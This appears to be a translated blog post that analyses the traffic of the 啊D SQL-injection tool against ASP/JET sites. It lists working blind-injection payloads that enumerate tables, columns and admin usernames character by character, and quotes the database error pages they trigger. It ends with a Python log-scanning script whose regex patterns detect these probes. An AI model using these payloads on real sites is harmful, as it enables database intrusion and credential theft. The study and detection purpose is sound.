啊D is a tool for detecting injection vulnerabilities, and it is also the tool that many beginners start with. To get a better understanding of how injection tools work internally, in this post we capture the traffic that 啊D sends and analyze how it implements its checks.
Injection point detection:
1. /?p=9' and char(124)+user+char(124)=0 and ''='
2. ?p=9 and char(124)+user+char(124)=0
3. ?p=9' and char(124)+user+char(124)=0 and '%'='
4. ?p=9 and 1=1
5. ?p=9 and 1=2
6. ?p=9' and 1=1 and ''='
Whether an injection point exists is decided by whether the returned page is normal or an error page.
Table detection:
1. asp?id=729 and exists (select * from [table name])
When the admin table exists:
display.asp?id=729 and exits (select * from admin)
Microsoft JET Database Engine 错误 '80040e14'
表达式中 'exits' 函数未定义。
/news/display.asp,行 6
When the table does not exist:
Microsoft JET Database Engine 错误 '80040e37'
Microsoft Jet 数据库引擎找不到输入表或查询 'acdmin'。 确定它是否存在,以及它的名称的拼写是否正确。
/news/display.asp,行 6
EXISTS
Specifies a subquery to test for the existence of rows.
Syntax:
EXISTS subquery
Arguments:
subquery
Is a restricted SELECT statement (the COMPUTE clause and the INTO keyword are not allowed). For more information, see the discussion of subqueries under SELECT.
Result type:
Boolean
Result value:
Returns TRUE if the subquery contains any rows.
Table-name detection in 啊D relies on its built-in list of table names, so when a table name is unusual or uncommon, 啊D can do nothing. The same holds for column names: when they are equally unusual, injection tools in general are helpless.
Column detection:
display.asp?id=729 and exists (select [column name] from [table name])
When the column exists, the normal page is returned; otherwise the response is:
Microsoft JET Database Engine 错误 '80040e10'
至少一个参数没有被指定值。
/news/display.asp,行 6
Content detection:
Content length:
/news/display.asp?id=729 and (select top 1 asc(mid(cstr(column name),start position, length)) from (Select Top 1 [username] from [admin] where 1=1 order by [username]) T Order by [username] desc) between -12500 and -10000
display.asp?id=729 and (select top 1 asc(mid(cstr(column name), start position, length)) from (Select Top 1 [username] from [admin] where 1=1 order by [username]) T Order by [username] desc) between -18005 and -18005
asc converts the character taken from the string into its ASCII code; mid locates a character within the string. A start position of 2 or 3 is commonly used, which makes it convenient to detect substrings that contain Chinese characters.
between ... and with very large negative values indicates the code of a Chinese (double-byte) character.
The two large negative bounds of between XX and XX are narrowed step by step in a fixed order until the normal page is returned, and the value is thereby obtained.
Getting the content length:
/news/display.asp?id=729 and (select top 1 len([username]) from (Select Top 2 [username] from [admin] where 1=1 order by [username]) T Order by [username] desc) between 0 and 99999999
/display.asp?id=729 and (select top 1 len([username]) from (Select Top 2 [username] from [admin] where 1=1 order by [username]) T Order by [username] desc) between 3 and 4
display.asp?id=729 and (select top 1 len([username]) from (Select Top 2 [username] from [admin] where 1=1 order by [username]) T Order by [username] desc) between 3 and 3
Integer length detection:
News_Show.asp?Id=67 and (select top 1 len([id]) from (Select Top 1 [id] from [admin] where 1=1 order by [id]) T Order by [id] desc) between 1 and 1
Integer content detection:
News_Show.asp?Id=67 and (select top 1 asc(mid(cstr(id),1,1)) from (Select Top 1 [id] from [admin] where 1=1 order by [id]) T Order by [id] desc) between 51 and 55
Getting the content:
Based on the length determined above:
display.asp?id=729 and (select top 1 asc(mid(cstr(username),1,1)) from (Select Top 2 [username] from [admin] where 1=1 order by [username]) T Order by [username] desc) between 30 and 130
display.asp?id=729 and (select top 1 asc(mid(cstr(username),4,1)) from (Select Top 2 [username] from [admin] where 1=1 order by [username]) T Order by [username] desc) between -12500 and -10000
Work out the content of each character.
The ASCII code of each character is used for the comparison, and the correct character is finally recovered.
That concludes our analysis of how 啊D works. The requests above are of course only fragments; 啊D does much more than this (for example, matching lengths and content with multiple threads).
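From a defender's side, every probe family captured above (the true/false page-differencing pair, the char(124)+user+char(124) test, the exists (select ...) table and column probes, the len([...]) length probes and the asc(mid(cstr(...))) ... between inference queries) leaves a recognisable trace in web-server logs, and the JET error pages quoted above leak database details in the response. The following Python script is an added example written for this post, not part of the original article or of the 啊D tool. It assumes a constructed, simplified IIS-style log format (date, time, client IP, method, path, URL-encoded query, status) and the sample log lines embedded in it are constructed; the probe labels are my own naming.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Probe families seen in the 啊D capture, as regexes over the decoded, lower-cased
# query string. The label names are an assumption (mine), not the tool's terms.
PROBE_PATTERNS = {
    "boolean_pair":   re.compile(r"\band\s+1\s*=\s*[12]\b"),
    "user_probe":     re.compile(r"char\(124\)\s*\+\s*user\s*\+\s*char\(124\)"),
    "table_probe":    re.compile(r"\bexi[s]?ts\s*\(\s*select\b"),  # also catches the 'exits' typo
    "length_probe":   re.compile(r"\blen\(\s*\[?\w+\]?\s*\)\s+from\s*\("),
    "char_inference": re.compile(r"asc\(\s*mid\(\s*cstr\(.*?\bbetween\s+-?\d+\s+and\s+-?\d+", re.S),
}

# JET error codes quoted in the post: 80040e14 (syntax), 80040e37 (missing table),
# 80040e10 (missing parameter/column). A response body carrying one of these leaks
# database structure to the client.
JET_ERROR_RE = re.compile(r"Microsoft JET Database Engine (?:错误|error) '80040e(?:14|37|10)'")

# Constructed log layout (assumption): date time ip method path query status
LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<path>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)

# Constructed sample log: one client replaying the probe sequence from the post,
# one client browsing normally.
SAMPLE_LOG = """\
2008-06-01 10:00:01 10.0.0.5 GET /news/display.asp id=729 200
2008-06-01 10:00:02 10.0.0.5 GET /news/display.asp id=729+and+1=1 200
2008-06-01 10:00:02 10.0.0.5 GET /news/display.asp id=729+and+1=2 200
2008-06-01 10:00:03 10.0.0.5 GET /news/display.asp id=729+and+char(124)%2Buser%2Bchar(124)=0 500
2008-06-01 10:00:04 10.0.0.5 GET /news/display.asp id=729+and+exists+(select+*+from+admin) 200
2008-06-01 10:00:05 10.0.0.5 GET /news/display.asp id=729+and+(select+top+1+len([username])+from+(Select+Top+2+[username]+from+[admin]+where+1=1+order+by+[username])+T+Order+by+[username]+desc)+between+0+and+99999999 200
2008-06-01 10:00:06 10.0.0.5 GET /news/display.asp id=729+and+(select+top+1+asc(mid(cstr(username),1,1))+from+(Select+Top+2+[username]+from+[admin]+where+1=1+order+by+[username])+T+Order+by+[username]+desc)+between+30+and+130 200
2008-06-01 10:00:07 10.0.0.5 GET /news/display.asp id=729+and+(select+top+1+asc(mid(cstr(username),4,1))+from+(Select+Top+2+[username]+from+[admin]+where+1=1+order+by+[username])+T+Order+by+[username]+desc)+between+-12500+and+-10000 500
2008-06-01 10:00:08 192.168.1.20 GET /news/display.asp id=730 200
2008-06-01 10:00:09 192.168.1.20 GET /news/display.asp id=731 200
"""


def classify_query(raw_query):
    """Return the probe labels whose pattern matches the decoded query string."""
    q = " ".join(unquote_plus(raw_query).lower().split())
    return [name for name, pat in PROBE_PATTERNS.items() if pat.search(q)]


def response_leaks_db_error(body):
    """True when a response body carries one of the JET error pages from the post."""
    return JET_ERROR_RE.search(body) is not None


def analyze(lines, inference_threshold=3):
    """Scan log lines; return (matching events, per-IP alert reasons)."""
    events = []
    per_ip = defaultdict(Counter)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        labels = classify_query(m["query"])
        if not labels:
            continue
        ip = m["ip"]
        for label in labels:
            per_ip[ip][label] += 1
        if m["status"] == "500":
            per_ip[ip]["server_error"] += 1
        events.append((ip, m["path"], labels, int(m["status"])))

    alerts = {}
    for ip, c in per_ip.items():
        reasons = []
        if c["boolean_pair"] >= 2:
            reasons.append("true/false page differencing (and 1=1 / and 1=2)")
        if c["table_probe"]:
            reasons.append("table/column existence probing via exists (select ...)")
        if c["char_inference"] + c["length_probe"] >= inference_threshold:
            reasons.append("blind character/length inference via asc(mid(cstr())) between")
        if c["server_error"]:
            reasons.append(f"{c['server_error']} HTTP 500 responses to probes (check for JET error leak)")
        if reasons:
            alerts[ip] = reasons
    return events, alerts


if __name__ == "__main__":
    events, alerts = analyze(SAMPLE_LOG.splitlines())
    for ip, reasons in alerts.items():
        print(ip)
        for r in reasons:
            print("  -", r)
```

The per-IP aggregation matters more than any single regex: one `and 1=1` in isolation is noise, but a client that sends the true/false pair, then `exists (select ...)`, then a run of `between` inference queries in a few seconds is following exactly the sequence the capture shows. On the response side, `response_leaks_db_error` is the check for the second problem the post illustrates: the JET error text itself confirms to the client which tables and columns exist, so a custom error page (or `Response.Status` without the engine's message) removes that oracle even before the query is fixed.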